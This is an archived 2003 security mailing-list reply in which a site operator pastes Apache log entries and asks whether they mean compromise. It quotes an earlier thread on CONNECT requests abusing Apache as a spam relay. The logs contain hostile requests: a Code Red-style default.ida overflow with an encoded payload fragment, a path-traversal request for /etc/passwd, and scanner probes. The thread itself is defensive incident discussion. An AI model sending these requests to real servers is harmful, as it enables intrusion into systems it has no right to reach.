Re: Strange CONNECT entries in apache logs

From: OSCAR (oscar7890_at_hotmail.com)
Date: 06/11/03

  • Next message: p00p_at_instable.net: "Re: Strange CONNECT entries in apache logs"
    Date: Tue, 10 Jun 2003 23:51:49 -0500
    To: BBDO Per˙ Lima <agencia@bbdoperu.com>
    
    

    If 200 is a successful connection, do these lines mean i am in
    trouble?...

    200.48.211.58 - - [10/Jun/2003:10:23:21 -0500] "GET
    /
    default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
    90%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00
    78%u0000%u00=a HTTP/1.0" 200 -

    21.10.41.230 - - [07/Jun/2003:09:34:20 -0500] "GET
    http://www.nessus.org HTTP/1.0" 200 2347

    21.10.41.230 - - [07/Jun/2003:09:32:49 -0500] "TRACE
    /thisFiledoesNotexist.html HTTP/1.1" 200 319

    21.10.41.230 - - [07/Jun/2003:09:32:43 -0500] "GET /%2e/ HTTP/1.1" 200
    2347

    21.10.41.230 - - [07/Jun/2003:09:32:48 -0500] "OPTIONS * HTTP/1.0" 200 -

    21.10.41.230 0 - - [07/Jun/2003:09:32:16 -0500] "GET
    /index.php?page=../../../../../../../../../../../../../../../etc/passwd
    HTTP/1.1" 200 38508

    21.10.41.230 - - [07/Jun/2003:09:32:14 -0500] "GET /?sql_debug=1
    HTTP/1.1" 200 2347

    21.10.41.230 - - [07/Jun/2003:09:31:42 -0500] "GET
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    /////////////// HTTP/1.1" 200 2347

    21.10.41.230 - - [07/Jun/2003:09:31:30 -0500] "GET /?Mode=debug
    HTTP/1.1" 200 2347

    212.253.114.134 - - [17/May/2003:15:34:11 -0500] "HEAD / HTTP/1.0" 200 0

    Thanks.

    -------
    Oscar

    On Monday, Jun 9, 2003, at 15:34 America/Lima, Christine Kronberg wrote:

    > On Fri, 6 Jun 2003, Rajkumar S wrote:
    >
    >>
    >> While going through my apache logs, I found some logs indicating
    >> CONNECT
    >> requests to port 25 of other hosts.
    >>
    >> 213.130.24.192 [06/Jun/2003:08:44:58 +0530] "CONNECT 194.67.23.20:25
    >> HTTP/1.1" 302 5 "-" "-"
    >> 130.94.247.248 [06/Jun/2003:10:26:17 +0530] "CONNECT 207.44.188.67:25
    >> HTTP/1.0" 200 14409 "-" "-"
    >> 130.94.247.248 [06/Jun/2003:09:56:21 +0530] "CONNECT smtp.rol.ru:25
    >> HTTP/1.0" 200 17757 "-" "-"
    >>
    >> I found this in 2 machines in indian ip block. My another server at US
    >> is not affected by this. Some one else seeing this? Could this be the
    >> next wave of spam ??
    >
    > Some people are using your apache as mailrelay. Did you enable
    > proxying? Getting a "200" indicates that the connect to those
    > mailservers was successful. Make sure that you configure your
    > apache not to accept CONNECTs from everywhere to other than
    > special ports, if you need proxying at all (if you don't need
    > it disable that feature).
    > I see people trying to connect to other servers each day, but
    > they get an "405" error.
    >
    > Cheers,
    >
    >
    >
    > Chris.
    >
    > --
    > GeNUA mbH
    >
    >
    >
    > -----------------------------------------------------------------------
    > -----
    > -----------------------------------------------------------------------
    > -----
    >

    ----------------------------------------------------------------------------
    ----------------------------------------------------------------------------


  • Next message: p00p_at_instable.net: "Re: Strange CONNECT entries in apache logs"

    Relevant Pages

    • Re: Strange CONNECT entries in apache logs
      ... no custom error pages in that server. ... > To: BBDO Per├║ Lima ... >> Some people are using your apache as mailrelay. ...
      (Incidents)
    • Re: apache question
      ... # Based upon the NCSA server configuration files originally by Rob McCool. ... # configuration directives that give the server its instructions. ... Directives that control the operation of the Apache server process as ...
      (alt.php)
    • Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
      ... The suEXEC feature provides Apache users the ability to run CGI and SSI ... under user IDs different from the user ID of the calling web server. ... Normally php and cgi scripts are not allowed to read files with the ... because the php script is run trough suEXEC. ...
      (Bugtraq)
    • Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
      ... The suEXEC feature provides Apache users the ability to run CGI and SSI ... under user IDs different from the user ID of the calling web server. ... Normally php and cgi scripts are not allowed to read files with the ... because the php script is run trough suEXEC. ...
      (Full-Disclosure)
    • Re: Apache and SSL
      ... # Based upon the NCSA server configuration files originally by Rob McCool. ... # This is the main Apache server configuration file. ... # configuration directives that give the server its instructions. ...
      (RedHat)